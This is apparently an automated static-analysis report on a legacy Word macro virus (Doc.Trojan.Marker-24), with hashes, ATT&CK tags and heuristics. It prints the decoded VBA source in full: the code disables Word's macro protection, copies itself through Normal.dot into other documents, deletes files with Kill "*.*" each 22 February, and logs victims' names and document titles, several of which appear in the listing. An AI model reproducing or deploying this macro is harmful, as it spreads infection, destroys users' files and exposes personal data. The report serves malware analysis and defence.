Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 180cce89269c027f…

MALICIOUS

Office (OLE)

Size: 48.0 KB
Created: 1999-04-02 06:35:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 297729181baf3c56f9ecd2ecb3654675
SHA-1: ed1414195bdcca6acb831e7e3b75df9e5ca09d8f
SHA-256: 180cce89269c027f1ffd8076ca37af65ac2d160529e2b4d70bdc3afe010e51a0
Risk Score: 160

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file is identified as malicious by ClamAV and contains VBA macros. The macro code, which runs from the Document_Close event after disabling Word's macro virus protection, attempts to infect the Normal template (Normal.dot) by copying its own code into it, and in turn copies itself from an infected Normal template into other documents as they are closed. The macro also contains a conditional payload that executes on February 22nd: a 'Kill *.*' command that deletes the files in the current directory, indicating destructive intent. The presence of legacy WordBasic auto-exec markers further suggests a malicious document.

Heuristics 3

  • ClamAV: Doc.Trojan.Marker-24 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-24
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; by itself it does not attribute the file to a downloader or to a parser CVE.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 16006 bytes
SHA-256: b21dd67f680cdc37c584af8039974f852a80031f7684684feb8ca9cee051ea6b
Detection: ClamAV: Doc.Trojan.Marker-24
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Document_Close()

On Error Resume Next

Const Murder = "<-- Its Murder!!"

'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim rep As Integer
Dim virusCode, UserAddress, LogData, LogFile As String

'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInfected = ad.codemodule.Find(Murder, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.codemodule.Find(Murder, 1, 1, 10000, 10000)

'Switch the VirusProtection OFF
Options.VirusProtection = False
Options.SaveNormalPrompt = False



'PayLoad
Delivery:
If Day(Now()) = 22 And Month(Now()) = 2 Then
       Kill "*.*":
       rep = MsgBox("That's Right", vbOK + vbCritical, "It's Murder")
       GoTo Delivery
       End If
       
'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
   


'.......................................................................................
  'Infect the NormalTemplate
  If DocumentInfected = True Then
  
    SaveNormalTemplate = NormalTemplate.Saved
  
  virusCode = ad.codemodule.Lines(1, ad.codemodule.countoflines)
    'Write a log file of this NormalTemplate infection
    For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
    Next i

    LogData = Chr(13) & _
              "' " & Format(Time, "hh:mm:ss AMPM -") & _
                     Format(Date, "dddd,d mmm,yyyy") & Chr(13) & _
              "' " & Application.UserName & Chr(13) & _
              "' " & Application.UserAddress & Chr(13) & _
              "' " & Application.ActiveDocument & Chr(13)
              
              
    virusCode = virusCode & LogData
   

    nt.codemodule.DeleteLines 1, nt.codemodule.countoflines
    nt.codemodule.AddFromString virusCode
    
    If SaveNormalTemplate = True Then NormalTemplate.Save
    
 
End If



'..........................................................................................
  'Infect the ActiveDocument
  If NormalTemplateInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
  
    SaveDocument = ActiveDocument.Saved
    
    virusCode = nt.codemodule.Lines(1, nt.codemodule.countoflines)

    ad.codemodule.DeleteLines 1, ad.codemodule.countoflines
    ad.codemodule.AddFromString virusCode
    
    If SaveDocument = True Then ActiveDocument.Save
      
  End If
  
    End If



End Sub


' Potential Murder Victims  "Marked for death...If I kiss you now, you'll probably die later..."
'

' 12:00:00 AM -Thursday,6 May,1999
' Ryde or Die
' The world
' ThE GeNiUs.doc

' 06:27:03 PM -Thursday,6 May,1999
' Valued Gateway Customer
'
' 1st Trial.doc



' 10:10:56 AM -Friday,7 May,1999
' Valued Gateway Customer
'
' 1st Trial.doc



' 02:33:34 PM -Saturday,8 May,1999
' Matthew E. Dawson
'
' Psychology paper.doc



' 08:17:21 PM -Wednesday,12 May,1999
' administrator
'
' str.doc



' 05:03:30  -Tuesday,6 Jul,1999
' VANDAMME CHRISTOPHE
'
' cv-0699.doc



' 01:24:15  -Wednesday,7 Jul,1999
' DUFLOT Jean Marc
'
' AUG-CCB-1.doc



' 03:52:40  -Friday,9 Jul,1999
' von Erlach Burkhart
'
' LETCOMV6.doc



' 03:54:51  -Tuesd
... (truncated)